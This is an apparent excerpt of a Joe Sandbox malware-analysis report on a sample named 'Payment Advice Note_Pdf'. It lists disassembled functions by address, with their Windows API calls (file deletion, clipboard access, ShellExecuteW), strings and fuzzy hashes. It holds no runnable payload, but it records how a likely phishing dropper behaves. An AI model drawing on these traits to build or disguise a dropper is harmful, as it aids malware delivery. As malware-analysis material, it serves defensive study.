SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F05
ImageList_Destroy.COMCTL32(?), ref: 00404F1A
GlobalFree.KERNEL32(?), ref: 00404F2A
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FA3
SendMessageW.USER32(?,00001102,?,?), ref: 0040504C
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040505B
InvalidateRect.USER32(?,00000000,00000001), ref: 0040507B
ShowWindow.USER32(?,00000000), ref: 004050C9
GetDlgItem.USER32(?,000003FE), ref: 004050D4
ShowWindow.USER32(00000000), ref: 004050DB

Strings

, xrefs: 004050B3
N, xrefs: 00404D85
M, xrefs: 00404CA4

Memory Dump Source

Source File: 00000002.00000002.1404753023.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1404721343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404789131.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404859591.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: cbd35bc537ad1fb5c8fe8071341114280d946198674fea80e747fafab01c69f9
Instruction ID: d9c0fbcad293e7aaadacffa1f228c55c0cff6ebba89157b443eef3cf19c2f35f
Opcode Fuzzy Hash: cbd35bc537ad1fb5c8fe8071341114280d946198674fea80e747fafab01c69f9
Instruction Fuzzy Hash: AF026FB0A00209EFDB209F54DD85AAE7BB5FB84314F10857AF610BA2E1D7799D42CF58

Function 00405810 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 148filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,763C3420,00436800,00434000), ref: 00405839
lstrcatW.KERNEL32(00424710,\*.*,00424710,?,?,763C3420,00436800,00434000), ref: 00405881
lstrcatW.KERNEL32(?,00409014,?,00424710,?,?,763C3420,00436800,00434000), ref: 004058A4
lstrlenW.KERNEL32(?,?,00409014,?,00424710,?,?,763C3420,00436800,00434000), ref: 004058AA
FindFirstFileW.KERNEL32(00424710,?,?,?,00409014,?,00424710,?,?,763C3420,00436800,00434000), ref: 004058BA
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,00409300,0000002E), ref: 0040595A
FindClose.KERNEL32(00000000), ref: 00405969

Strings

\*.*, xrefs: 0040587B

Memory Dump Source

Source File: 00000002.00000002.1404753023.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1404721343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404789131.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404859591.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 2035342205-1173974218
Opcode ID: 4fb6421756a88129fd8c5299e0ee644403a5a953871eba58af647f09c9a40e4d
Instruction ID: d8405d9d0b65c0b5bb91e26b2d86fa163654aae1973f92c1c3fedea70a861e09
Opcode Fuzzy Hash: 4fb6421756a88129fd8c5299e0ee644403a5a953871eba58af647f09c9a40e4d
Instruction Fuzzy Hash: EA41F271800A18FACB21BB658C49BBF7A78EB81365F10817BF805711D1C77C4D919EAE

Function 004066E3 Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1404753023.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1404721343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404789131.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404859591.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d5afdfc0dd836d6b0ea96e9b1d1cc0e1a6a0a23e9a334f3c2dfe03cdace4acf
Instruction ID: 25739d06ab219284b51534763859987154442e2999ed31f69dfe775b8bf1d6bb
Opcode Fuzzy Hash: 4d5afdfc0dd836d6b0ea96e9b1d1cc0e1a6a0a23e9a334f3c2dfe03cdace4acf
Instruction Fuzzy Hash: 09F17671D00229CBCF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44

Function 00406362 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00425758,00424F10,00405B24,00424F10,00424F10,00000000,00424F10,00424F10, 4<v,?,00436800,00405830,?,763C3420,00436800), ref: 0040636D
FindClose.KERNEL32(00000000), ref: 00406379

Strings

XWB, xrefs: 00406363

Memory Dump Source

Source File: 00000002.00000002.1404753023.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1404721343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404789131.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404859591.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: XWB
API String ID: 2295610775-4039527733
Opcode ID: 0fc78072580e2aa021d4eb5561dc00c277e918fd128e5e9fad30f275acd9c25d
Instruction ID: b60ab41fd2821b41d0b392bba1ac2053f61c2dcbfada57179e30504603363e2d
Opcode Fuzzy Hash: 0fc78072580e2aa021d4eb5561dc00c277e918fd128e5e9fad30f275acd9c25d
Instruction Fuzzy Hash: BBD0123194C1209FD3401778BD0C88B7B989B553317214B72FD2AF23E0C3388C6586D9

Function 004052BD Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 0040531B
GetDlgItem.USER32(?,000003EE), ref: 0040532A
GetClientRect.USER32(?,?), ref: 00405367
GetSystemMetrics.USER32(00000002), ref: 0040536E
SendMessageW.USER32(?,00001061,00000000,?), ref: 0040538F
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053A0
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053B3
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053C1
SendMessageW.USER32(?,00001024,00000000,?), ref: 004053D4
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004053F6
ShowWindow.USER32(?,00000008), ref: 0040540A
GetDlgItem.USER32(?,000003EC), ref: 0040542B
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040543B
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405454
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405460
GetDlgItem.USER32(?,000003F8), ref: 00405339

Part of subcall function 00404118: SendMessageW.USER32(00000028,?,00000001,00403F44), ref: 00404126

GetDlgItem.USER32(?,000003EC), ref: 0040547D
CreateThread.KERNEL32(00000000,00000000,Function_00005251,00000000), ref: 0040548B
CloseHandle.KERNEL32(00000000), ref: 00405492
ShowWindow.USER32(00000000), ref: 004054B6
ShowWindow.USER32(?,00000008), ref: 004054BB
ShowWindow.USER32(00000008), ref: 00405505
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405539
CreatePopupMenu.USER32 ref: 0040554A
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040555E
GetWindowRect.USER32(?,?), ref: 0040557E
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405597
SendMessageW.USER32(?,00001073,00000000,?), ref: 004055CF
OpenClipboard.USER32(00000000), ref: 004055DF
EmptyClipboard.USER32 ref: 004055E5
GlobalAlloc.KERNEL32(00000042,00000000), ref: 004055F1
GlobalLock.KERNEL32(00000000), ref: 004055FB
SendMessageW.USER32(?,00001073,00000000,?), ref: 0040560F
GlobalUnlock.KERNEL32(00000000), ref: 0040562F
SetClipboardData.USER32(0000000D,00000000), ref: 0040563A
CloseClipboard.USER32 ref: 00405640

Strings

{, xrefs: 00405523

Memory Dump Source

Source File: 00000002.00000002.1404753023.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1404721343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404789131.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404859591.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 256eaf401863e6f134331f393f4e22088e35d249b428c518254339ec8ac6420b
Instruction ID: 3cf410e3b9716a944c4f9a47a0d896a4f96f7db2f8ccf501d1eae2c46102dad2
Opcode Fuzzy Hash: 256eaf401863e6f134331f393f4e22088e35d249b428c518254339ec8ac6420b
Instruction Fuzzy Hash: 85B13A71900208FFDB21AF60DD85AAE7B79FB44355F40803AFA01BA1A0C7755E52DF69

Function 00403C0B Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C47
ShowWindow.USER32(?), ref: 00403C64
DestroyWindow.USER32 ref: 00403C78
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403C94
GetDlgItem.USER32(?,?), ref: 00403CB5
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CC9
IsWindowEnabled.USER32(00000000), ref: 00403CD0
GetDlgItem.USER32(?,00000001), ref: 00403D7E
GetDlgItem.USER32(?,00000002), ref: 00403D88
SetClassLongW.USER32(?,000000F2,?), ref: 00403DA2
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403DF3
GetDlgItem.USER32(?,00000003), ref: 00403E99
ShowWindow.USER32(00000000,?), ref: 00403EBA
EnableWindow.USER32(?,?), ref: 00403ECC
EnableWindow.USER32(?,?), ref: 00403EE7
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403EFD
EnableMenuItem.USER32(00000000), ref: 00403F04
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F1C
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F2F
lstrlenW.KERNEL32(00422708,?,00422708,00428220), ref: 00403F58
SetWindowTextW.USER32(?,00422708), ref: 00403F6C
ShowWindow.USER32(?,0000000A), ref: 004040A0

Memory Dump Source

Source File: 00000002.00000002.1404753023.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1404721343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404789131.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404859591.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: 29d98916bb57448504604f007a9dcc129868aca8cf15625f917b47a6b2c47760
Instruction ID: 61cac7681639d4f9e887145b94be1570fe16d39d0a036e069046cfcd2a92ab20
Opcode Fuzzy Hash: 29d98916bb57448504604f007a9dcc129868aca8cf15625f917b47a6b2c47760
Instruction Fuzzy Hash: 3BC1C071A04200BBDB316F61ED84E2B3AACEB95705F50053EF601B11F1CB799992DB6E

Function 00404280 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 207windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040431E
GetDlgItem.USER32(?,000003E8), ref: 00404332
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040434F
GetSysColor.USER32(?), ref: 00404360
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040436E
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040437C
lstrlenW.KERNEL32(?), ref: 00404381
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040438E
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043A3
GetDlgItem.USER32(?,0000040A), ref: 004043FC
SendMessageW.USER32(00000000), ref: 00404403
GetDlgItem.USER32(?,000003E8), ref: 0040442E
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404471
LoadCursorW.USER32(00000000,00007F02), ref: 0040447F
SetCursor.USER32(00000000), ref: 00404482
ShellExecuteW.SHELL32(0000070B,open,004271C0,00000000,00000000,00000001), ref: 00404497
LoadCursorW.USER32(00000000,00007F00), ref: 004044A3
SetCursor.USER32(00000000), ref: 004044A6
SendMessageW.USER32(00000111,00000001,00000000), ref: 004044D5
SendMessageW.USER32(00000010,00000000,00000000), ref: 004044E7

Strings

N, xrefs: 0040441C
open, xrefs: 0040448F

Memory Dump Source

Source File: 00000002.00000002.1404753023.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1404721343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404789131.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404859591.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: N$open
API String ID: 3615053054-904208323
Opcode ID: 2c4f6cf5a4aa9f0210a02c82683795d0b5a579b88aa58951f10bca9314f1fa64
Instruction ID: 4b5324550c8b175de7ac8ee9e9744dd98fad869a56f6e91fb07d2f074fcd5292
Opcode Fuzzy Hash: 2c4f6cf5a4aa9f0210a02c82683795d0b5a579b88aa58951f10bca9314f1fa64
Instruction Fuzzy Hash: F87172B1A00209BFDB109F60DD85E6A7B69FB84354F00853AF705B62E1C778AD51CFA9

Function 00403868 Relevance: 37.0, APIs: 13, Strings: 8, Instructions: 215stringregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 004063F5: GetModuleHandleA.KERNEL32(?,?,00000020,004032D6,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00406407
Part of subcall function 004063F5: GetProcAddress.KERNEL32(00000000,?), ref: 00406422

lstrcatW.KERNEL32(00436000,00422708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422708,00000000,00000002,763C3420,00436800,00000000,00434000), ref: 004038E9
lstrlenW.KERNEL32(004271C0,?,?,?,004271C0,00000000,00434800,00436000,00422708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422708,00000000,00000002,763C3420), ref: 00403969
lstrcmpiW.KERNEL32(004271B8,.exe,004271C0,?,?,?,004271C0,00000000,00434800,00436000,00422708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422708,00000000), ref: 0040397C
GetFileAttributesW.KERNEL32(004271C0), ref: 00403987
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00434800), ref: 004039D0

Part of subcall function 00405F66: wsprintfW.USER32 ref: 00405F73

RegisterClassW.USER32(004281C0), ref: 00403A0D
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A25
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A5A
ShowWindow.USER32(00000005,00000000), ref: 00403A90
GetClassInfoW.USER32(00000000,RichEdit20W,004281C0), ref: 00403ABC
GetClassInfoW.USER32(00000000,RichEdit,004281C0), ref: 00403AC9
RegisterClassW.USER32(004281C0), ref: 00403AD2
DialogBoxParamW.USER32(?,00000000,00403C0B,00000000), ref: 00403AF1

Strings

.DEFAULT\Control Panel\International, xrefs: 004038D4
RichEd20, xrefs: 00403A96
RichEd32, xrefs: 00403AA4
_Nb, xrefs: 004039EC, 00403A54
.exe, xrefs: 00403976
RichEdit20W, xrefs: 00403AB4, 00403ABA
RichEdit, xrefs: 00403AC3
Control Panel\Desktop\ResourceLocale, xrefs: 0040389C

Memory Dump Source

Source File: 00000002.00000002.1404753023.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1404721343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404789131.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404859591.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-1115850852
Opcode ID: 6531155729b12b3db4317baa7316d137489df1ba31409079f45b2788b5703c98
Instruction ID: 2be98759588b12f3ea5babf1b6ec1a1322f2c31473ef1d4f92accd895ea03b39
Opcode Fuzzy Hash: 6531155729b12b3db4317baa7316d137489df1ba31409079f45b2788b5703c98
Instruction Fuzzy Hash: C861A670644200BAD220AF669D45F3B3A6CEB84749F80457FF941B22E2CB7C6D01CA7E

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00428220,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000002.00000002.1404753023.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1404721343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404789131.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404859591.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 6e8d97c549c1634dd7cb3ad4fe557c39b8a0e77cc2ec0408d7783d5d6495b6da
Instruction ID: b0ee482b8836f8c5ddb0523b9b95fc6b4c0959077eeb464a3039c1fdf8a9f2d7
Opcode Fuzzy Hash: 6e8d97c549c1634dd7cb3ad4fe557c39b8a0e77cc2ec0408d7783d5d6495b6da
Instruction Fuzzy Hash: F6418B71804249AFCB058FA5DD459BFBBB9FF44310F00852AF951AA1A0C738EA51DFA5

Function 00405D4E Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00425DA8,NUL,?,00000000,?,00409300,00405EE1,?,?), ref: 00405D5D
CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00409300,00405EE1,?,?), ref: 00405D81
GetShortPathNameW.KERNEL32(?,00425DA8,00000400), ref: 00405D8A

Part of subcall function 00405B59: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E3A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B69
Part of subcall function 00405B59: lstrlenA.KERNEL32(00000000,?,00000000,00405E3A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9B

GetShortPathNameW.KERNEL32(004265A8,004265A8,00000400), ref: 00405DA7
wsprintfA.USER32 ref: 00405DC5
GetFileSize.KERNEL32(00000000,00000000,004265A8,C0000000,00000004,004265A8,?,?,?,?,?), ref: 00405E00
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E0F
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E47
SetFilePointer.KERNEL32(00409578,00000000,00000000,00000000,00000000,004259A8,00000000,-0000000A,00409578,00000000,[Rename],00000000,00000000,00000000), ref: 00405E9D
GlobalFree.KERNEL32(00000000), ref: 00405EAE
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EB5

Part of subcall function 00405BF4: GetFileAttributesW.KERNEL32(00000003,00402E2E,00437800,80000000,00000003,?,?,00000000,00403504,?), ref: 00405BF8
Part of subcall function 00405BF4: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,00403504,?), ref: 00405C1A

Strings

%ls=%ls, xrefs: 00405DBB
[Rename], xrefs: 00405E2F, 00405E41
NUL, xrefs: 00405D57

Memory Dump Source

Source File: 00000002.00000002.1404753023.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1404721343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404789131.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404859591.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
String ID: %ls=%ls$NUL$[Rename]
API String ID: 222337774-899692902
Opcode ID: c86fc2f234fdcbab174ed31dbeacc33569e633a9a0cc25c0f84ee2e7b98327ca
Instruction ID: 907d7383bdf99192a2874dfd68d01e77647b980fe5b363d6f0c9d0989479472f
Opcode Fuzzy Hash: c86fc2f234fdcbab174ed31dbeacc33569e633a9a0cc25c0f84ee2e7b98327ca
Instruction Fuzzy Hash: 88311F71A05B14BBD6206B229C48F6B3A6CDF45755F14043ABE41F62D2DA3CEE018AFD

Function 0040457E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 004045CD
SetWindowTextW.USER32(00000000,?), ref: 004045F7
SHBrowseForFolderW.SHELL32(?), ref: 004046A8
CoTaskMemFree.OLE32(00000000), ref: 004046B3
lstrcmpiW.KERNEL32(004271C0,00422708,00000000,?,?), ref: 004046E5
lstrcatW.KERNEL32(?,004271C0), ref: 004046F1
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404703

Part of subcall function 00405748: GetDlgItemTextW.USER32(?,?,00000400,0040473A), ref: 0040575B

Part of subcall function 004062B3: CharNextW.USER32(00409300,*?|<>/":,00000000,00434000,763C3420,00436800,00000000,00403245,00436800,00436800,00403496), ref: 00406316
Part of subcall function 004062B3: CharNextW.USER32(00409300,00409300,00409300,00000000), ref: 00406325
Part of subcall function 004062B3: CharNextW.USER32(00409300,00434000,763C3420,00436800,00000000,00403245,00436800,00436800,00403496), ref: 0040632A
Part of subcall function 004062B3: CharPrevW.USER32(00409300,00409300,763C3420,00436800,00000000,00403245,00436800,00436800,00403496), ref: 0040633D

GetDiskFreeSpaceW.KERNEL32(004206D8,?,?,0000040F,?,004206D8,004206D8,?,00000001,004206D8,?,?,000003FB,?), ref: 004047C6
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047E1

Part of subcall function 0040493A: lstrlenW.KERNEL32(00422708,00422708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 004049DB
Part of subcall function 0040493A: wsprintfW.USER32 ref: 004049E4
Part of subcall function 0040493A: SetDlgItemTextW.USER32(?,00422708), ref: 004049F7

Strings

A, xrefs: 004046A1

Memory Dump Source

Source File: 00000002.00000002.1404753023.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1404721343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404789131.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404859591.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A
API String ID: 2624150263-3554254475
Opcode ID: 22a18b3fd3a3f6943f7d8bba8abb0502ad51d2b161b15ce1560af62b9c12c724
Instruction ID: 5fc8bddc00f1cc174a6dc329f65f284a7a254117467b0892f0b405221262b822
Opcode Fuzzy Hash: 22a18b3fd3a3f6943f7d8bba8abb0502ad51d2b161b15ce1560af62b9c12c724
Instruction Fuzzy Hash: D9A150B1D00209ABDB11AFA5CC85AAF77B8EF84315F11843BF611B72D1D77C8A418B69

Function 00406041 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 207stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00000000,004216E8,?,004051B5,004216E8,00000000,00000000,?), ref: 00406104
GetSystemDirectoryW.KERNEL32(004271C0,00000400), ref: 00406182
GetWindowsDirectoryW.KERNEL32(004271C0,00000400), ref: 00406195
SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004061D1
SHGetPathFromIDListW.SHELL32(?,004271C0), ref: 004061DF
CoTaskMemFree.OLE32(?), ref: 004061EA
lstrcatW.KERNEL32(004271C0,\Microsoft\Internet Explorer\Quick Launch), ref: 0040620E
lstrlenW.KERNEL32(004271C0,00000000,004216E8,?,004051B5,004216E8,00000000,00000000,?), ref: 00406268

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00406150
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406208

Memory Dump Source

Source File: 00000002.00000002.1404753023.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1404721343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404789131.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404859591.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-730719616
Opcode ID: 383e64acdd3e999a3ce1aae6b9e604668670d9992715b0ed71236db8e2785ebc
Instruction ID: fd30239bcabdd6b9b5dacf38e9278243e7343c89492a0aeb8152419411716c6f
Opcode Fuzzy Hash: 383e64acdd3e999a3ce1aae6b9e604668670d9992715b0ed71236db8e2785ebc
